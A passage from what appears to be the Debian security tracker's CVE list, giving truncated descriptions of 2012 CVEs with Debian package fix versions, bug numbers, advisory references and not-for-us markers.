Financial Services Software CVE-2012-1705 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2012-1704 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-1703 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2496-1} - mysql-5.1 5.1.62-1 (bug #670636) - mysql-5.5 5.5.23-1 CVE-2012-1702 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2012-1701 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1700 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1699 (The ProcSetEventMask function in difs/events.c in the xfs font server ...) - xfs 1:1.0.1-1 CVE-2012-1698 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Solaris CVE-2012-1697 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.23-1 CVE-2012-1696 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.23-1 CVE-2012-1695 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...) NOT-FOR-US: Oracle Fusion CVE-2012-1694 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Solaris CVE-2012-1693 (Unspecified vulnerability in Oracle SPARC Enterprise M Series Servers ...) NOT-FOR-US: Oracle SPARC Enterprise M Series Servers CVE-2012-1692 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2012-1691 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Solaris CVE-2012-1690 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2496-1} - mysql-5.1 5.1.62-1 (bug #670636) - mysql-5.5 5.5.23-1 CVE-2012-1689 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, ...) {DSA-2496-1} - mysql-5.1 (bug #682212) - mysql-5.5 5.5.24+dfsg-1 (bug #682210) CVE-2012-1688 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2496-1} - mysql-5.1 5.1.62-1 (bug #670636) - mysql-5.5 5.5.23-1 CVE-2012-1687 (Unspecified vulnerability in Oracle Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Solaris 10 and 11 CVE-2012-1686 (Unspecified vulnerability in the Oracle Business Intelligence ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1685 (Unspecified vulnerability in the Secure Global Desktop component in ...) NOT-FOR-US: Oracle Virtualization CVE-2012-1684 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2012-1683 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2012-1682 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.2-1 CVE-2012-1681 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Solaris CVE-2012-1680 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-1679 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle FLEXCUBE CVE-2012-1678 (Unspecified vulnerability in the JD Edwards EnterpriseOne Tools ...) NOT-FOR-US: Oracle JD Edwards Products CVE-2012-1677 (Unspecified vulnerability in the Oracle Application Server Single ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-1676 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle FLEXCUBE CVE-2012-1674 (Unspecified vulnerability in the Siebel Clinical component in Oracle ...) NOT-FOR-US: Oracle Siebel CVE-2012-1673 (SQL injection vulnerability in loginscript.php in e-ticketing allows ...) NOT-FOR-US: e-ticketing CVE-2012-1672 (SQL injection vulnerability in getcity.php in Hotel Booking Portal 0.1 ...) NOT-FOR-US: Hotel Booking Portal CVE-2012-1671 (Directory traversal vulnerability in index.php in phpPaleo 4.8b155 and ...) NOT-FOR-US: phpPaleo CVE-2012-1670 (admin/index.php in PHP Grade Book before 1.9.5 BETA allows remote ...) NOT-FOR-US: PHP Grade Book CVE-2012-1669 RESERVED CVE-2012-1668 RESERVED CVE-2012-1667 (ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before ...) {DSA-2486-1} - bind9 1:9.8.1.dfsg.P1-4.1 - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) CVE-2012-1666 (Untrusted search path vulnerability in VMware Tools in VMware ...) NOT-FOR-US: VMware Tools CVE-2012-1665 RESERVED CVE-2012-1664 RESERVED CVE-2012-1663 (Double free vulnerability in libgnutls in GnuTLS before 3.0.14 allows ...) - gnutls28 3.0.14-1 - gnutls26 (only GNUTLS 3.0 is affected) CVE-2012-1662 (CA ARCserve Backup r12.0 through SP2, r12.5 before SP2, r15 through ...) NOT-FOR-US: CA ARCserve Backup CVE-2012-1661 (ESRI ArcMap 9 and ArcGIS 10.0.2.3200 and earlier does not properly ...) NOT-FOR-US: ESRI ArcMap, ArcGIS CVE-2012-1660 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1659 (Cross-site scripting (XSS) vulnerability in the Node Recommendation ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1658 (Cross-site scripting (XSS) vulnerability in the Read More Link module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1657 (Cross-site scripting (XSS) vulnerability in block_class.module in the ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1656 (SQL injection vulnerability in the Multisite Search module 6.x-2.2 for ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1655 (Unspecified vulnerability in the UC PayDutchGroup / WeDeal payment ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1654 (Multiple cross-site scripting (XSS) vulnerabilities in the Data module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1653 (Cross-site scripting (XSS) vulnerability in the Taxonomy Views ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1652 (Cross-site scripting (XSS) vulnerability in the Hierarchical Select ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1651 (Cross-site scripting (XSS) vulnerability in the Submenu Tree module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1650 (The ZipCart module 6.x before 6.x-1.4 for Drupal checks the "access ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1649 (Cool Aid module before 6.x-1.9 for Drupal does not enforce access ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1648 (Cross-site scripting (XSS) vulnerability in the Cool Aid module before ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1647 (Multiple cross-site scripting (XSS) vulnerabilities in the "stand ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1646 (Multiple cross-site scripting (XSS) vulnerabilities in the FAQ module ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1645 (The CDN module 6.x-2.2 and 7.x-2.2 for Drupal, when running in Origin ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1644 (The Organic Groups (OG) Vocabulary module 6.x-1.x before 6.x-1.2 for ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1643 (The Faster Permissions module 7.x-2.x before 7.x-1.2 for Drupal does ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1642 (includes/linkchecker.pages.inc in the Link checker module 6.x-2.x ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1641 (The finder_import function in the Finder module 6.x-1.x before ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1640 (Multiple cross-site scripting (XSS) vulnerabilities in the Managesite ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1639 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1638 (SQL injection vulnerability in the Search Autocomplete module before ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1637 RESERVED NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1636 (Cross-site request forgery (CSRF) vulnerability in the stickynote ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1635 (The hook_node_access function in the revisioning module 7.x-1.x before ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1634 (Cross-site scripting (XSS) vulnerability in video_filter.codecs.inc in ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1633 (Cross-site request forgery (CSRF) vulnerability in the Password Policy ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1632 (Cross-site scripting (XSS) vulnerability in password_policy.admin.inc ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1631 (Cross-site request forgery (CSRF) vulnerability in the Admin:hover ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1630 (Cross-site scripting (XSS) vulnerability in the Taxonomy Navigator ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1629 (Cross-site scripting (XSS) vulnerability in the Taxotouch module for ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1628 (Cross-site scripting (XSS) vulnerability in the SuperCron module for ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1627 (Cross-site scripting (XSS) vulnerability in vud_term.module in the ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1626 (SQL injection vulnerability in the conversion form for Events in the ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1625 (Eval injection vulnerability in the fillpdf_form_export_decode ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1624 (Multiple cross-site scripting (XSS) vulnerabilities in the Lingotek ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1623 (The Registration Codes module before 6.x-2.4 for Drupal does not ...) NOT-FOR-US: Drupal addon module not packaged in Debian CVE-2012-1622 RESERVED NOT-FOR-US: Apache OFBiz CVE-2012-1621 RESERVED NOT-FOR-US: Apache OFBiz CVE-2012-1620 (slock 0.9 does not properly handle the XRaiseWindow event when the ...) - suckless-tools (unimportant; bug #667796) CVE-2012-1619 RESERVED CVE-2012-1618 (Interaction error in the PostgreSQL JDBC driver before 8.2, when used ...) - libpgjava (Even the version in oldstable had 8.2) CVE-2012-1617 (Directory traversal vulnerability in combine.php in OSClass before ...) NOT-FOR-US: OSClass not in Debian CVE-2012-1616 (Use-after-free vulnerability in icclib before 2.13, as used by Argyll ...) - argyll 1.4.0-1 NOTE: Starting with 1.4.0 argyll includes icclib 2.13, but it's hard to identify the NOTE: isolated security fix CVE-2012-1615 [sectool dbus priv escalation] RESERVED NOT-FOR-US: sectool CVE-2012-1614 (Coppermine Photo Gallery before 1.5.20 allows remote attackers to ...) NOT-FOR-US: Coppermine CVE-2012-1613 (Cross-site scripting (XSS) vulnerability in edit_one_pic.php in ...) NOT-FOR-US: Coppermine CVE-2012-1612 (Cross-site scripting (XSS) vulnerability in the update manager in ...) - joomla (bug #571794) CVE-2012-1611 (Joomla! 2.5.x before 2.5.4 does not properly check permissions, which ...) - joomla (bug #571794) CVE-2012-1610 (Integer overflow in the GetEXIFProperty function in magick/property.c ...) {DSA-2462-1} - imagemagick 8:6.7.4.0-4 (bug #667635) CVE-2012-1609 RESERVED CVE-2012-1608 (The t3lib_div::RemoveXSS API method in TYPO3 4.4.0 through 4.4.13, ...) {DSA-2445-1} - typo3-src 4.5.14+dfsg1-1 CVE-2012-1607 (The Command Line Interface (CLI) script in TYPO3 4.4.0 through 4.4.13, ...) {DSA-2445-1} - typo3-src 4.5.14+dfsg1-1 CVE-2012-1606 (Multiple cross-site scripting (XSS) vulnerabilities in the Backend ...) {DSA-2445-1} - typo3-src 4.5.14+dfsg1-1 CVE-2012-1605 (The Extbase Framework in TYPO3 4.6.x through 4.6.6, 4.7, and 6.0 ...) - typo3-src (vulnerable code not yet present) CVE-2012-1604 (Cross-site scripting (XSS) vulnerability in NextBBS 0.6 allows remote ...) NOT-FOR-US: NextBBS CVE-2012-1603 (Multiple SQL injection vulnerabilities in ajaxserver.php in NextBBS ...) NOT-FOR-US: NextBBS CVE-2012-1602 (user.php in NextBBS 0.6 allows remote attackers to bypass ...) NOT-FOR-US: NextBBS CVE-2012-1601 (The KVM implementation in the Linux kernel before 3.3.6 allows host OS ...) {DSA-2469-1} - linux-2.6 3.2.17-1 (low) CVE-2012-1600 [XSS from 5.0.4 release] RESERVED - phppgadmin 5.0.4-1 [squeeze] - phppgadmin (Minor issue, will be fixed through a point update) CVE-2012-1599 (Joomla! 1.5.x before 1.5.26 does not properly check permissions, which ...) - joomla (bug #571794) CVE-2012-1598 (Joomla! 1.5.x before 1.5.26 has unspecified impact and attack vectors ...) - joomla (bug #571794) CVE-2012-1597 (Cross-site scripting (XSS) vulnerability in the textEncode function in ...) NOT-FOR-US: eZ Publish CVE-2012-1596 (The mp2t_process_fragmented_payload function in ...) - wireshark 1.6.6-1 (unimportant; bug #666058) NOTE: Not suitable for code injection CVE-2012-1595 (The pcap_process_pseudo_header function in wiretap/pcap-common.c in ...) - wireshark 1.6.6-1 (bug #666058) [squeeze] - wireshark 1.2.11-6+squeeze7 CVE-2012-1594 (epan/dissectors/packet-ieee80211.c in the IEEE 802.11 dissector in ...) - wireshark 1.6.6-1 (unimportant; bug #666058) NOTE: Not suitable for code injection CVE-2012-1593 (epan/dissectors/packet-ansi_a.c in the ANSI A dissector in Wireshark ...) - wireshark 1.6.6-1 (unimportant; bug #666058) [squeeze] - wireshark 1.2.11-6+squeeze7 NOTE: Not suitable for code injection CVE-2012-1592 RESERVED - libstruts1.2-java (Only applies to Struts 2, see bug #657870) CVE-2012-1591 (The image module in Drupal 7.x before 7.14 does not properly check ...) - drupal7 7.14-1 (bug #671402) CVE-2012-1590 (The forum list in Drupal 7.x before 7.14 does not properly check user ...) - drupal7 7.14-1 (bug #671402) CVE-2012-1589 (Open redirect vulnerability in the Form API in Drupal 7.x before 7.13 ...) - drupal7 7.14-1 (bug #671402) CVE-2012-1588 (Algorithmic complexity vulnerability in the _filter_url function in ...) - drupal7 7.14-1 (bug #671402) CVE-2012-1587 REJECTED CVE-2012-1585 (OpenStack Compute (Nova) Essex before 2011.3 allows remote ...) - nova 2012-1~rc3-1 (bug #666888) CVE-2012-1584 (Integer overflow in the mid function in toolkit/tbytevector.cpp in ...) - taglib 1.7.1-1 (low; bug #662705) [squeeze] - taglib (Minor issue) CVE-2012-1583 (Double free vulnerability in the xfrm6_tunnel_rcv function in ...) - linux-2.6 2.6.22-1 CVE-2012-1582 (Cross-site scripting (XSS) vulnerability in the wikitext parser in ...) - mediawiki 1:1.15.5-9 (bug #666269) CVE-2012-1581 (MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 uses weak ...) - mediawiki 1:1.15.5-9 (bug #666269) CVE-2012-1580 (Cross-site request forgery (CSRF) vulnerability in Special:Upload in ...) - mediawiki (Vulnerable code not present, see bug #666269) CVE-2012-1579 (The resource loader in MediaWiki 1.17.x before 1.17.3 and 1.18.x ...) - mediawiki (Vulnerable code not present, see bug #666269) CVE-2012-1578 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) - mediawiki (Vulnerable code not present, see bug #666269) CVE-2012-1577 RESERVED - dietlibc 0.33~cvs20120325-1 (unimportant) CVE-2012-1576 (The myuser_delete function in libathemecore/account.c in Atheme 5.x ...) NOT-FOR-US: atheme CVE-2012-1575 (Multiple cross-site scripting (XSS) vulnerabilities in Cumin before ...) NOT-FOR-US: cumin CVE-2012-1574 (The Kerberos/MapReduce security functionality in Apache Hadoop ...) - hadoop (bug #535861) CVE-2012-1573 (gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before ...) {DSA-2441-1} - gnutls26 2.12.18-1 (high) - gnutls28 3.0.17-2 (high) CVE-2012-1572 RESERVED - keystone 2012.1~rc2-1 CVE-2012-1571 (file before 5.11 and libmagic allow remote attackers to cause a denial ...) {DSA-2422-1} - file 5.11-1 (low; bug #664263) CVE-2012-1570 (The resolver in MaraDNS before 1.3.0.7.15 and 1.4.x before 1.4.12 ...) - maradns 1.4.12-1 (bug #665012) [squeeze] - maradns 1.4.03-1.1+squeeze1 CVE-2012-1569 (The asn1_get_length_der function in decoding.c in GNU Libtasn1 before ...) {DSA-2440-1} - libtasn1-3 2.12-1 (high) CVE-2012-1568 (The ExecShield feature in a certain Red Hat patch for the Linux kernel ...) - linux-2.6 (execshield issue) CVE-2012-1567 RESERVED NOT-FOR-US: LinuxMint CVE-2012-1566 RESERVED NOT-FOR-US: LinuxMint CVE-2012-1565 (Unspecified vulnerability in ez Publish 4.1.4, 4.2, 4.3, 4.4, 4.5, and ...) NOT-FOR-US: eZ Publish CVE-2012-1564 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: YVS CVE-2012-1563 RESERVED - joomla (bug #571794) CVE-2012-1562 RESERVED - joomla (bug #571794) CVE-2012-1561 RESERVED NOT-FOR-US: Drupal Finder CVE-2012-1560 RESERVED CVE-2012-1559 RESERVED CVE-2012-1558 (yaSSL CyaSSL before 2.0.8 allows remote attackers to cause a denial of ...) - cyassl (bug #598391) NOTE: https://github.com/cyassl/cyassl/commit/6b77c8967aa34f2a0bae85e90a469c4170cb2bb1 CVE-2012-1557 (SQL injection vulnerability in admin/plib/api-rpc/Agent.php in ...) NOT-FOR-US: Parallels Plesk Panel CVE-2012-1556 RESERVED CVE-2012-1555 RESERVED CVE-2012-1554 RESERVED CVE-2012-1553 RESERVED CVE-2012-1552 RESERVED CVE-2012-1551 RESERVED CVE-2012-1550 RESERVED CVE-2012-1549 RESERVED CVE-2012-1548 RESERVED CVE-2012-1547 RESERVED CVE-2012-1546 RESERVED CVE-2012-1545 (Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1544 REJECTED CVE-2012-1543 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-1542 RESERVED CVE-2012-1541 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-1540 RESERVED CVE-2012-1539 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1538 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1537 (Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 ...) NOT-FOR-US: DirectX 9.0 in Microsoft Windows CVE-2012-1536 RESERVED CVE-2012-1535 (Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-1534 REJECTED CVE-2012-1533 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-1532 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-1531 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2012-1530 (Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and ...) NOT-FOR-US: Adobe Reader and Acrobat CVE-2012-1529 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...) NOT-FOR-US: Internet Explorer CVE-2012-1528 (Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2012-1527 (Integer underflow in Windows Shell in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2012-1526 (Microsoft Internet Explorer 6 and 7 does not properly handle objects ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1525 (Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader CVE-2012-1524 (Microsoft Internet Explorer 9 does not properly handle objects in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1523 (Microsoft Internet Explorer 6 through 8 does not properly handle ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1522 (Microsoft Internet Explorer 9 does not properly handle objects in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2012-1521 (Use-after-free vulnerability in the XML parser in Google Chrome before ...) - chromium-browser 18.0.1025.168~r134367-1 CVE-2012-1520 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-1519 RESERVED CVE-2012-1518 (VMware Workstation 8.x before 8.0.2, VMware Player 4.x before 4.0.2, ...) NOT-FOR-US: VMware CVE-2012-1517 (The VMX process in VMware ESXi 4.1 and ESX 4.1 does not properly ...) NOT-FOR-US: VMware CVE-2012-1516 (The VMX process in VMware ESXi 3.5 through 4.1 and ESX 3.5 through 4.1 ...) NOT-FOR-US: VMware CVE-2012-1515 (VMware ESXi 3.5, 4.0, and 4.1 and ESX 3.5, 4.0, and 4.1 do not ...) NOT-FOR-US: VMware ESXi CVE-2012-1514 (Cross-site request forgery (CSRF) vulnerability in VMware vShield ...) NOT-FOR-US: VMware vShield Manager CVE-2012-1513 (The Web Configuration tool in VMware vCenter Orchestrator (vCO) 4.0 ...) NOT-FOR-US: VMware vCenter Orchestrator CVE-2012-1512 (Cross-site scripting (XSS) vulnerability in the internal browser in ...) NOT-FOR-US: VMware vSphere CVE-2012-1511 (Cross-site scripting (XSS) vulnerability in View Manager Portal in ...) NOT-FOR-US: VMware View CVE-2012-1510 (Buffer overflow in the WDDM display driver in VMware ESXi 4.0, 4.1, ...) NOT-FOR-US: VMware ESXi CVE-2012-1509 (Buffer overflow in the XPDM display driver in VMware View before 4.6.1 ...) NOT-FOR-US: VMware View CVE-2012-1508 (The XPDM display driver in VMware ESXi 4.0, 4.1, and 5.0; VMware ESX ...) NOT-FOR-US: VMware ESXi CVE-2012-1507 RESERVED CVE-2012-1506 RESERVED CVE-2012-1505 RESERVED CVE-2012-1504 RESERVED CVE-2012-1503 RESERVED CVE-2012-1502 (Double free vulnerability in the PyPAM_conv in PAMmodule.c in PyPam ...) {DSA-2430-1} - python-pam 0.4.2-13 CVE-2012-1501 REJECTED CVE-2012-1500 RESERVED CVE-2012-1499 (The JPEG 2000 codec (jp2.c) in OpenJPEG before 1.5 allows remote ...) - openjpeg (vulnerable code introduced after 1.3) CVE-2012-1498 (Multiple cross-site request forgery (CSRF) vulnerabilities in Webfolio ...) NOT-FOR-US: Webfolio CMS CVE-2012-1497 (The default configuration of Movable Type before 4.38, 5.0x before ...) {DSA-2423-1} - movabletype-opensource 5.1.3+dfsg-1 CVE-2012-1496 RESERVED CVE-2012-1495 RESERVED CVE-2012-1102 [XML::Atom Perl module XML entity expansion] RESERVED {DSA-2424-1} - libxml-atom-perl 0.39-1 (medium) CVE-2012-1494 RESERVED CVE-2012-1493 (F5 BIG-IP appliances 9.x before 9.4.8-HF5, 10.x before 10.2.4, 11.0.x ...) NOT-FOR-US: F5 BIG-IP appliances CVE-2012-1492 RESERVED CVE-2012-1491 RESERVED CVE-2012-1490 RESERVED CVE-2012-1489 RESERVED CVE-2012-1488 RESERVED CVE-2012-1487 RESERVED CVE-2012-1486 RESERVED CVE-2012-1485 (Unspecified vulnerability in the NetFront Life Browser ...) NOT-FOR-US: NetFront Life Browser for Android CVE-2012-1484 (Unspecified vulnerability in the WaliSMS CN (cn.com.wali.walisms) ...) NOT-FOR-US: WaliSMS CN (cn.com.wali.walisms) application CVE-2012-1483 (Unspecified vulnerability in the Message Forwarder ...) NOT-FOR-US: Message Forwarder for Android CVE-2012-1482 (Unspecified vulnerability in the TouchPal Contacts ...) NOT-FOR-US: TouchPal Contacts for Android CVE-2012-1481 (Unspecified vulnerability in the Textdroid (com.app.android.textdroid) ...) NOT-FOR-US: Textdroid for Android CVE-2012-1480 (Unspecified vulnerability in the Pansi SMS (com.pansi.msg) application ...) NOT-FOR-US: Pansi SMS CVE-2012-1479 (Unspecified vulnerability in the AContact (com.movester.quickcontact) ...) NOT-FOR-US: AContact CVE-2012-1478 (Unspecified vulnerability in the UCMobile BloveStorm (com.blovestorm) ...) NOT-FOR-US: UCMobile BloveStorm CVE-2012-1477 (Unspecified vulnerability in the Cnectd (mci.cnectd) application 3.1.0 ...) NOT-FOR-US: Cnectd CVE-2012-1476 (Unspecified vulnerability in the KKtalk (com.kkliaotian.android) ...) NOT-FOR-US: KKtalk CVE-2012-1475 (Unspecified vulnerability in the YagattaTalk Messenger ...) NOT-FOR-US: YagattaTalk Messenge CVE-2012-1474 (Unspecified vulnerability in the Youni SMS (com.snda.youni) ...) NOT-FOR-US: Youni SMS CVE-2012-1473 RESERVED CVE-2012-1472 (VMware vCenter Chargeback Manager (aka CBM) before 2.0.1 does not ...) NOT-FOR-US: VMware vCenter Chargeback Manager CVE-2012-1471 (Directory traversal vulnerability in catalogue_file.php in ocPortal ...) - ocportal (bug #625865) CVE-2012-1470 (Multiple cross-site scripting (XSS) vulnerabilities in code_editor.php ...) - ocportal (bug #625865) CVE-2012-1469 (Multiple cross-site scripting (XSS) vulnerabilities in Open Journal ...) - ojs (low) [squeeze] - ojs (Minor issue) CVE-2012-1468 (Incomplete blacklist vulnerability in Open Journal Systems before ...) - ojs (low) [squeeze] - ojs (Minor issue) CVE-2012-1467 (Multiple directory traversal vulnerabilities in the iBrowser plugin ...) - ojs (low) [squeeze] - ojs (Minor issue) CVE-2012-1466 (The Traffic Grapher Server for NetMechanica NetDecision before 4.6.1 ...) NOT-FOR-US: NetMechanica NetDecision CVE-2012-1465 (Stack-based buffer overflow in the HTTP Server in NetMechanica ...) NOT-FOR-US: NetMechanica NetDecision CVE-2012-1464 (Dashboard Server for NetMechanica NetDecision before 4.6.1 allows ...) NOT-FOR-US: NetMechanica NetDecision CVE-2012-1463 (The ELF file parser in AhnLab V3 Internet Security 2011.01.18.00, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1462 (The ZIP file parser in AhnLab V3 Internet Security 2011.01.18.00, AVG ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1461 (The Gzip file parser in AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1460 (The Gzip file parser in Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1459 (The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, ...) - clamav 0.97.5+dfsg-1 (low; bug #668273) [squeeze] - clamav 0.97.5+dfsg-3~squeeze1 CVE-2012-1458 (The Microsoft CHM file parser in ClamAV 0.96.4 and Sophos Anti-Virus ...) - clamav 0.97.5+dfsg-1 (low; bug #668273) [squeeze] - clamav 0.97.5+dfsg-3~squeeze1 CVE-2012-1457 (The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK ...) - clamav 0.97.5+dfsg-1 (low; bug #668273) [squeeze] - clamav 0.97.5+dfsg-3~squeeze1 CVE-2012-1456 (The TAR file parser in AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1455 (The CAB file parser in NOD32 Antivirus 5795 and Rising Antivirus ...) NOT-FOR-US: NOD32 Antivirus, Rising Antivirus CVE-2012-1454 (The ELF file parser in Dr.Web 5.0.2.03300, eSafe 7.0.17.0, McAfee ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1453 (The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1452 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1451 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1 and Ikarus Virus ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1450 (The CAB file parser in Emsisoft Anti-Malware 5.1.0.1, Sophos ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1449 (The CAB file parser in NOD32 Antivirus 5795 and Rising Antivirus ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1448 (The CAB file parser in Quick Heal (aka Cat QuickHeal) 11.00, Trend ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1447 (The ELF file parser in Fortinet Antivirus 4.2.254.0, eSafe 7.0.17.0, ...) NOT-FOR-US: multiple Anti-Virus applications CVE-2012-1446 (The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee ...) 